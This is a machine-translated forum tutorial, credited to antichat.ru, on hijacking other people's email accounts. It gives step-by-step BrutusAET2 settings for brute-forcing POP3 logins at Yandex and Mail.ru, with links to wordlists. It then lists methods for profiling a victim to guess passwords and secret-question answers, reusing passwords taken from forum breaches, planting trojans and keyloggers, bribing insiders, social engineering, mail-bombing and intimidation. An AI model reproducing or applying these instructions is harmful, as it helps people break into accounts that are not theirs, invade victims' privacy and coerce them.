This page has been robot translated, sorry for typos if any. Original content here.

We break soap, we use BrutusAET2

MATERIAL IS PUT FOR SIGNIFICANT PURPOSES. THE AUTHOR IS NOT RESPONSIBLE FOR ANY RESPONSIBILITY

And so, I want to tell you: how to hijack a soapbox (e-mail) using the BrutusAET2 program.

Let's start.

We will need :

1) The program for the partition of passwords BrutusAET2, which can be downloaded from here:
http://www.hoobie.net/brutus/brutus-aet2.zip

2) Dictionaries, which can be taken from here:
http://www.passwords.ru/dic.php
http://www.insidepro.com/eng/download.shtml
http://www.outpost9.com/files/WordLists.html
http://www.acolytez.com/dict/
http://www.phreak.com/html/wordlists.shtml
http://www.mobilstar.ru/files/dict/

3) Straight arms.

For example, I will give hijacking mylnik @ yandex.ru.

Setup of the program for a partition of passwords of BrutusAET2:

1) Opened the program.
2) In the Target field we write pop.yandex.ru
3) In the Type field, select POP3

Connection Options:

1) Port set 110.
2) Connections set at a maximum, ie 60.
3) Timeout set at max. 60


POP3 options:
Do not touch =)


Authentication options:


If we want to tweak the list of soapboxes , then we need to create a textbook, let's call it users.txt, there it means to throw in lists of users.
For example:
Vasja_pupkin
Abcdefgh
Abcabc

We climb in a program there we put a tick about Username.

Use Username: specify the path to the list of users.


Go to the password list ...
Create it means a text words.txt and there we shove passwords.
For example:
Password
Pass
123


We climb into the program and choose

Pass mode : Word list
Pass file : specify the path to the password list.


It is also easy to break mylniki on mail.ru simply put in Target: pop.mail.ru and the rest is all the same.

In general, everything should work out as in the screenshot:
Hacking mail

some useful links from me ...

Hashes: decrypt passwords
"Click once to show a spoiler - click again to hide ..."


Dictionaries:
"Click once to show a spoiler - click again to hide ..."

links !!! All references to the World !!!




================================================= ======================

methods for selecting passwords for beginners


Method number 1. "Brutus" / long /

The first method we will have is Brutus (Brute Force) - a brute force method.
What you need:
1. Program for brute force BrutusA2 (WWWHack or similar)
2. Know the address of the incoming mail (pop3) of the mail service. This address can be found in the help or faq sections on the mailer site.
3.Also desired passwords dictionary (Passwords List)
..
Pros: the password will always be selected! (if not by dictionary, then brute force)
Cons: to find it guaranteed - it may take several millennia or millions of years.
..
Recommendations:
Since brute force is the longest way, and in order to reduce it somehow, it is necessary:
A. Go and register yourself a box on the mailer that will be brutal. When registering, pay attention to the "Password" field. Your task is to find out the requirements of the postal service to the minimum and maximum password length, and the characters used (next to the field, it is usually written like this).
b.Open the password dictionary (I prefer the Raptor program for such purposes), sort the dictionary by password length (from shorter to longer), remove passwords that do not fit the length of the mail service requirements, as well as with forbidden characters.
c. Use data from the "Collecting information" method (see below)
..
Help for those who do not have Internet:
Brute Force (Spoken: Brutus): Brute force selection - brute force. Example for brute force:
aaa
aab
aac
...
zzx
zzw
zzz
etc.

Example for iterating "By dictionary":
abila
abott
abitz
admin
etc.
Those. Since many people use meaningful and easy-to-remember words to remember a password, why should we go through the characters for a long time if we are going to go through the words faster?
ps Where to take (mentioned in the method):
BrutusA2 -> http://www.hoobie.net/brutus/brutus-download.html
Raptor -> http://madmax.deny.de/products/raptor/download.htm
pss About passwords which are often chosen - in another, separate article.



Method number 2. "Collecting information" / requires attention /

What you need:
Search Engines:
http://google.com
http://ya.ru
http://rambler.ru
http://aport.ru
http://yahoo.com
How we do:
We hammer in our soap in search and we look for where it meets. We go and all that we find (where it occurs, on what site, what it wrote and what it asked, when, under what login) we copy and store in a notebook for further analysis.
After that, we analyze and draw general conclusions about the interests of the person, trying to substitute the found (year of birth, nickname, name, interests, etc.) as a password.
..
Recommendations:
You need to search for all search engines as a full soap my_email@mail.ru and only by the login my_email
Getting on the Forum (finding his login (nickname)): right-clicking on the image of his Avatar and looking at the path of this image (what if he didn’t upload it to the Forum but used his own one on his website? (Although he could have taken someone else’s )). We also click on his profile and everything that is there - also copy to Notepad (there may be an ICQ number and year of birth, interests, etc.). Do not forget in the profile (if any) click on the link "Find all posts by user". Carefully read. Maybe there will be some clue (keeping in mind the "Secret Question"). Everything is informative and different from "Gyg", "Lol", etc. - in Notepad.
If we find his second soap - we pass again through search engines.
The same applies to ICQ (in a circle on search engines). With ICQ, do not forget to look at [forbidden link]
Also, do not forget to search by soap and nickname on http://www.icq.com
If he has an original nickname - AmSuPerrR, also go over search engines. It's just that if he has a standard nickname - Alex, then you can hardly sort out 12 million pages (although you can try using the syntax of search queries and sorting “search in found”).
When you have accumulated in Notepad, perhaps a decent list of information, start from it to form a password list for this user. And: you must try to substitute the year of birth in different formats. For example, you have found that the year of birth 01.01.2005
Try these options:
01012005
010105
112005
1105
Also try the options (where my_email is his login):
my_email2005
my_email05
Or:
his name is 2005
his name05
etc.
Substitute easy. Just copied into a notebook, "decompose" by words in a column, and try to write several options for each found. And after that you can use the Brutus method.
Also check the found "second soap" on the subject they exist or not. It may turn out that they were registered long ago, and then they were no longer necessary. Then you register it for yourself and try to recover the password for it from Forums, chats, directories, etc.



Method number 3. "Password recovery" / sometimes effective /

How we do:
First, we climb to the postal service and click the link "Forgot your password!" (or similar). We look what there is a secret question.
For example, if it is “My favorite dish”, then for girls you can try to substitute the word ice cream
If "Grandmother's Year of Birth", "Passport Number", "Mother's Maiden Name" - then try 111, 123, 12345, the year of birth of your password "remind", perhaps the answer will be the year of registration of soap, and so on. Since it is not often those who know the year of birth of the grandmother and remember the mother's maiden name. With the passport number is more difficult, as some really take it and drive it straight through it. But still try 111, 123 ...
Also, the data collected in the method of "collecting information" can help you here.

Added (Eco [L] og):
Sometimes a secret question can be like this: 1234567qwerty
Then, in some cases, the answer to it may be 1234567qwerty
Or similar, recruited by the method "on the clave from the bald" (pick this will be almost not realistic)



Method number 4. "Recovery from another service" / in a hurry and the password from the soap you can take, and the base of the forum / chat /

The whole point is that the password from the soap is harder to pick up than the password from the Forum, chat, dating service, live log, etc. Those. from those places that are visited or visited by the one whose soap is “restored”. From here we go around all the sites, forums, etc. which came into our field of view with the method of "collecting information". We are looking at what is there, for example, for the Forum and we are already reducing our task to finding vulnerabilities to this Forum (using the same google.ru)
We have a chance (not a big one, but a chance) that the password from the Forum will go to soap.



Method number 5. "Troyan" / demanding /

The method speaks for itself. The task is to boil down Troyan or some Keyloger thread (which you should have, respectively), and expect reports (logs) from them.
Here, the methods of "Vulnerability of software" and "SI / Social Engineering /" will help for pairing.



Method number 6. "Software Vulnerabilities" / requiring the necessary knowledge /

This is probably a helper method for the Trojan method. In order for the Troyan to push in, one must put a lot of effort into But it will be easier if you know the current vulnerabilities in the software. The same browsers, email programs (Outlook, TheBat!, Etc.), perhaps, ICQ. Then your task will be reduced to linking to a thread on your site, when a visitor accessing Troyan through a vulnerability in the Browser, it will load and run. Or sending a "hurried" formed letter.



Method number 7. "Vulnerability of postal services" / also requires knowledge or ability to use a search engine /

The method directly relates to the vulnerability of postal services. They sometimes come up from time to time. Starting from sending a letter, when viewing the User’s browser, which settings are changed, and until recently, with the interception of a package changing the password of your mailbox, changing it (the package) and changing the password to the desired box. Well, etc.



Method number 8. "Have hundreds of rubles, friends will wait" / invoice. requires to have a job and wm-wallet /

You go to the okolokhake site and ask for a certain reward to “remind” the password. But then be careful when you pay, because I threw up a lot of divorces (and what was the difference - they always were).
..
Recommendations:
Never transfer the payment in advance (100% guarantee that no one will “remind” the password (more precisely, some people can give it, but they will be paid by you when you pay for it - before or after. And they mostly take it after order completion) .))
As a proof, do not be aware that the letter was sent from the mailbox you need.
Also, do not immediately lead when the proof will be according to the scheme:
You send any letter to the box you need, and then (after some time) you are sent the text of this letter.
As a defense against throwing, you can use the scheme “through the Guarantor” or the scheme which is higher, but slightly corrected:
1.You agree when you are both online.
2.You send to a "required" soap for you a thread of text and you should be told immediately what text you sent.
Then at least there is a guarantee that the soap is under control. But with the transfer of money - negotiate yourself.



Method number 9. "Do not have a hundred rubles, and have a hundred friends" / the ability to make acquaintances /

Just have a good friend (admin, caliper, or, better, director) working either to the office where the soap is, or providing the hosting / Internet office where the soap is.
Well, or a person who is at risk from the FSB, FAPSI, Office of the "K" (P), will exceed his official authority, find out the password from the support of the postal service and tell you.
This is a very bad and wrong method. And almost very rarely found (and thank God)
Or have a friend - the administrator of the Forum, chat, etc. where people are sitting. If you are not familiar, nothing prevents you as a thread to meet him ...



Method number 10. "SI / Social Engineering /" / The most accurate method. Requires the ability to set the task, analyze. training required /

Many of the previously described methods somehow come together and overlap with this method. The same thing - this method requires some data from other methods (such as "Collecting information", "Vulnerability of mail services", etc.)
This is the most extensive and extensive method. Therefore, right now, briefly, and then put it in a separate article.
The general meaning is to ensure that the Password from the soap is obtained directly from the owner. Or to persuade him to perform any actions you need (the same guaranteed launch of Troyan).
By "learn directly from the host" it is understood that this very password the host will "tell you". But he will not even understand that without knowing it, he gave it to you (and maybe he will, but later).
ps About the SI method and its submethods - next. article (if there is a desire and interest)



Method number 11. "What the hell does he need?" / long but relatively simple method /

The essence of the method is to force the owner to refuse the mailbox voluntarily (sometimes, after all, it is necessary to “restore” not in order to read, but in order to have the necessary box). And it's easier to do it - just periodically spam this box. If the mailbox owner is not too clueless how to get rid of such spam, then in a couple of weeks he will get tired of raking out of the box or cleaning him of tons of letters and he will abandon him. And mail services are not rubber. And when there is a space limit for the box and when it is not visited, then such a box will eventually be deleted.



And finally, an alternative method
Method number 12. "Fear" / criminal /

You catch the master in the gate ...

by antichat.ru